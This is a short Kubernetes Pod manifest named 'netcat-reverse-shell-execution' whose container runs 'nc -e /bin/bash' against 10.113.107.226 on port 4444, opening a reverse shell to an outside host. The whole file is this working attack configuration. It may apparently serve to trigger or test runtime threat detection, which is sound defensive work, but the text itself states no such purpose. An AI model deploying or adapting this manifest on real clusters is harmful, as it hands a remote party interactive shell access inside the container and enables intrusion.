apiVersion: v1
kind: Pod
metadata:
  name: netcat-reverse-shell-execution
spec:
  restartPolicy: Never
  containers:
  - name: netcat-reverse-shell-execution
    image: angelrita/base-ubuntu:latest
    #imagePullPolicy: Never
    command: ['sh']
    args: ['-c', 'nc -e /bin/bash 10.113.107.226 4444']
    ports:
    - containerPort: 4444
